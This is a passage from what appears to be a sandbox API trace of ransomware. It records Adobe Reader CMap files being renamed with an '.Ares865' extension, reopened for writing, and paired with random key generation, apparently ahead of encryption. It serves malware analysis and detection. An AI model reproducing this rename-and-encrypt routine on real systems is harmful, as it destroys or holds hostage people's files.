Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C.Ares865") returned 73 [0161.758] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2c"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2c.ares865"), dwFlags=0x1) returned 1 [0161.760] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.761] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=284606) returned 1 [0161.761] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.762] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.762] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.787] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.791] lstrcpyW (in: lpString1=0x2cce46e, lpString2="B5pc-V" | out: lpString1="B5pc-V") returned="B5pc-V" [0161.792] lstrlenW (lpString="B5pc-V") returned 6 [0161.792] lstrlenW (lpString="Ares865") returned 7 [0161.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V.Ares865") returned 69 [0161.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-v.ares865"), dwFlags=0x1) returned 1 [0161.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3095) returned 1 [0161.795] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.796] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.801] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CNS-EUC-H" | out: lpString1="CNS-EUC-H") returned="CNS-EUC-H" [0161.801] lstrlenW (lpString="CNS-EUC-H") returned 9 [0161.801] lstrlenW (lpString="Ares865") returned 7 [0161.801] lstrcmpiW (lpString1="S-EUC-H", lpString2="Ares865") returned 1 [0161.801] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H.Ares865") returned 72 [0161.801] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-h.ares865"), dwFlags=0x1) returned 1 [0161.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12805) returned 1 [0161.804] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.808] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.809] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.809] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.809] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CNS-EUC-V" | out: lpString1="CNS-EUC-V") returned="CNS-EUC-V" [0161.810] lstrlenW (lpString="CNS-EUC-V") returned 9 [0161.810] lstrlenW (lpString="Ares865") returned 7 [0161.810] lstrcmpiW (lpString1="S-EUC-V", lpString2="Ares865") returned 1 [0161.810] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V.Ares865") returned 72 [0161.810] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-v.ares865"), dwFlags=0x1) returned 1 [0161.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13885) returned 1 [0161.816] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.817] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.817] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.820] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.822] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETen-B5-H" | out: lpString1="ETen-B5-H") returned="ETen-B5-H" [0161.822] lstrlenW (lpString="ETen-B5-H") returned 9 [0161.822] lstrlenW (lpString="Ares865") returned 7 [0161.822] lstrcmpiW (lpString1="en-B5-H", lpString2="Ares865") returned 1 [0161.822] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H.Ares865") returned 72 [0161.822] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-h.ares865"), dwFlags=0x1) returned 1 [0161.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.826] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8115) returned 1 [0161.826] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.827] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.827] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.829] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.830] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETen-B5-UCS2" | out: lpString1="ETen-B5-UCS2") returned="ETen-B5-UCS2" [0161.830] lstrlenW (lpString="ETen-B5-UCS2") returned 12 [0161.830] lstrlenW (lpString="Ares865") returned 7 [0161.830] lstrcmpiW (lpString1="B5-UCS2", lpString2="Ares865") returned 1 [0161.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2.Ares865") returned 75 [0161.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=288463) returned 1 [0161.834] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.857] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.858] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.858] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.862] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETen-B5-V" | out: lpString1="ETen-B5-V") returned="ETen-B5-V" [0161.862] lstrlenW (lpString="ETen-B5-V") returned 9 [0161.862] lstrlenW (lpString="Ares865") returned 7 [0161.862] lstrcmpiW (lpString1="en-B5-V", lpString2="Ares865") returned 1 [0161.862] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V.Ares865") returned 72 [0161.862] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-v.ares865"), dwFlags=0x1) returned 1 [0161.864] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3134) returned 1 [0161.865] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.866] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.866] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.869] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.870] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.870] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.870] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETenms-B5-H" | out: lpString1="ETenms-B5-H") returned="ETenms-B5-H" [0161.870] lstrlenW (lpString="ETenms-B5-H") returned 11 [0161.870] lstrlenW (lpString="Ares865") returned 7 [0161.870] lstrcmpiW (lpString1="ms-B5-H", lpString2="Ares865") returned 1 [0161.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H.Ares865") returned 74 [0161.871] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-h.ares865"), dwFlags=0x1) returned 1 [0161.872] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2877) returned 1 [0161.873] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.873] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.873] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.878] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.879] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.879] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.880] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETenms-B5-V" | out: lpString1="ETenms-B5-V") returned="ETenms-B5-V" [0161.880] lstrlenW (lpString="ETenms-B5-V") returned 11 [0161.880] lstrlenW (lpString="Ares865") returned 7 [0161.880] lstrcmpiW (lpString1="ms-B5-V", lpString2="Ares865") returned 1 [0161.880] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V.Ares865") returned 74 [0161.880] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-v.ares865"), dwFlags=0x1) returned 1 [0161.884] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.884] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3209) returned 1 [0161.884] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.885] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.885] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.887] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.889] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETHK-B5-H" | out: lpString1="ETHK-B5-H") returned="ETHK-B5-H" [0161.889] lstrlenW (lpString="ETHK-B5-H") returned 9 [0161.889] lstrlenW (lpString="Ares865") returned 7 [0161.889] lstrcmpiW (lpString1="HK-B5-H", lpString2="Ares865") returned 1 [0161.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H.Ares865") returned 72 [0161.889] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-h.ares865"), dwFlags=0x1) returned 1 [0161.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.891] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24599) returned 1 [0161.891] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.896] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.896] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.897] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ETHK-B5-V" | out: lpString1="ETHK-B5-V") returned="ETHK-B5-V" [0161.897] lstrlenW (lpString="ETHK-B5-V") returned 9 [0161.897] lstrlenW (lpString="Ares865") returned 7 [0161.897] lstrcmpiW (lpString1="HK-B5-V", lpString2="Ares865") returned 1 [0161.898] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V.Ares865") returned 72 [0161.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-v.ares865"), dwFlags=0x1) returned 1 [0161.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.900] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3114) returned 1 [0161.901] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.901] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.901] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.904] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.904] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.904] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.905] lstrcpyW (in: lpString1=0x2cce46e, lpString2="EUC-H" | out: lpString1="EUC-H") returned="EUC-H" [0161.905] lstrlenW (lpString="EUC-H") returned 5 [0161.905] lstrlenW (lpString="Ares865") returned 7 [0161.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H.Ares865") returned 68 [0161.905] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-h.ares865"), dwFlags=0x1) returned 1 [0161.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.908] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5351) returned 1 [0161.909] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.913] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.914] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.914] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.914] lstrcpyW (in: lpString1=0x2cce46e, lpString2="EUC-V" | out: lpString1="EUC-V") returned="EUC-V" [0161.914] lstrlenW (lpString="EUC-V") returned 5 [0161.914] lstrlenW (lpString="Ares865") returned 7 [0161.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V.Ares865") returned 68 [0161.914] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V" (normalized: "c:\\program files 